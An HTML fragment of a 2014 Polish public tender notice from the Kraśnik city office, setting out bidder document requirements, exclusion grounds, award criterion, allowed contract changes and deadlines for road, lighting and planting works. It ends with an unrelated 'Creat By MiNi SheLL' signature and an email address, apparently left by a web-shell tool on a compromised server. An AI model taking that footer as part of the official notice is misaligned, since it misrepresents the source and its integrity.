<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku. Warunek dotyczący sytuacji ekonomicznej i finansowej oceniony zostanie na podstawie oświadczenia (zał. nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>a)roboty polegającena budowie dróg, chodników, parkingów lub ścieżek rowerowych o nawierzchni z kostki brukowej o powierzchni min. 3000 m2 każda oraz
b)roboty polegające na wykonaniu oświetlenia ulicznego lub/i parkowego o wartości minimum 200 000,00 zł brutto każda.;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>a)usługi dotyczące nasadzeń drzew i/lub krzewów i/lub bylin o wartości co najmniej 50 000,00zł brutto każda oraz
b)usługi polegające na założeniu trawników o powierzchni min. 2000 m2 każda.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wraz z formularzem oferty podpisanym przez upełnomocnionych przedstawicieli (formularz oferty stanowi załącznik nr 1 do SIWZ), jeżeli prawo do podpisywania oferty nie wynika z dołączonych dokumentów, należy dołączyć pełnomocnictwo do podpisania oferty - oryginał lub notarialnie poświadczona kopia. Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - w przypadku nie dysponowania takimi zasobami przez Wykonawcę (wzór zobowiązania stanowi załącznik nr 6 do SIWZ).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian w umowie w następujących przypadkach:
1)Termin wykonania umowy może ulec przesunięciu w przypadku opóźnień wynikających z:
przestojów i opóźnień zawinionych przez zamawiającego,
wystąpienia warunków atmosferycznych uniemożliwiających wykonywanie robót - fakt ten musi zostać zgłoszony zamawiającemu i zostać potwierdzony przez inspektora nadzoru w dzienniku budowy,
poleceń wydawanych przez Inspektora Nadzoru mających wpływ na termin wykonania lecz nie wynikających z uchybień Wykonawcy,
wykopalisk uniemożliwiających prowadzenie robót,                                                                              
wystąpienia istotnego błędu w dokumentacji projektowej - termin umowny może zostać wydłużony o czas niezbędny na usuniecie wad w projekcie,
konieczności uzyskania decyzji lub uzgodnień, mogących spowodować wstrzymanie robót z przyczyn niezależnych od wykonawcy,
podpisania umowy na zamówienia dodatkowe, o których mowa w art. 67 ust. 1 pkt 5 ustawy Prawo zamówień publicznych, o ile wykonywanie tych zamówień wpływa na termin wykonania niniejszej umowy. 
2)	Zmiana (za zgodą Zamawiającego) materiałów budowlanych, sprzętu, urządzeń, gdy wykorzystanie materiałów budowlanych, sprzętu, urządzeń wskazanych w dokumentacji projektowej lub ofercie stanie się niemożliwe bądź podyktowane będzie usprawnieniem procesu budowy, zwiększeniem bezpieczeństwa na budowie - w sytuacji wystąpienia 
i w granicach uzasadnionego interesu Zamawiającego (zamiany na materiały, urządzenia 
i sprzęt posiadające co najmniej takie same parametry techniczne, jakościowe i cechy użytkowe, jak te, które stanowiły podstawę wyboru oferty, pod warunkiem nie zwiększania wynagrodzenia).
3)	Zamawiający przewiduje możliwość zmiany kierownika budowy i kierowników robót przy czym osoby zastępujące muszą spełniać warunki określone w SIWZ.
4)	Wysokość wynagrodzenia Wykonawcy może ulec zmianie w razie ustawowej zmiany stawek podatku VAT, zmianie ulega kwota netto, bez zmiany kwoty brutto. 
5)	w przypadku gdy Wykonawca w ofercie nie przewidział korzystania z podwykonawców, przewiduje się możliwą zmianę umowy dotyczącą powierzenia przez wykonawcę wykonywania części zamówienia podwykonawcom lub dalszym podwykonawcom, jeżeli wykonawca uzna to za konieczne i złoży odpowiedni wniosek w formie pisemnej,
6)	w przypadku gdy Wykonawca w ofercie przewidział korzystanie z podwykonawców, przewiduje się możliwą zmianę umowy dotyczącą samodzielnego wykonania przedmiotu zamówienia lub zwiększenia bądź zmniejszenia liczby podwykonawców, jeżeli wykonawca uzna to za konieczne i złoży odpowiedni wniosek w formie pisemnej, przy czym jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, 
w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://umkrasnik.bip.lubelskie.pl/index.php?id=51<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Kraśnik
ul. Lubelska 84
23-200 Kraśnik
pok. 312.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2014 godzina 11:00, miejsce: Urząd Miasta Kraśnik
ul. Lubelska 84
23-200 Kraśnik
kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 12.06.2014.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com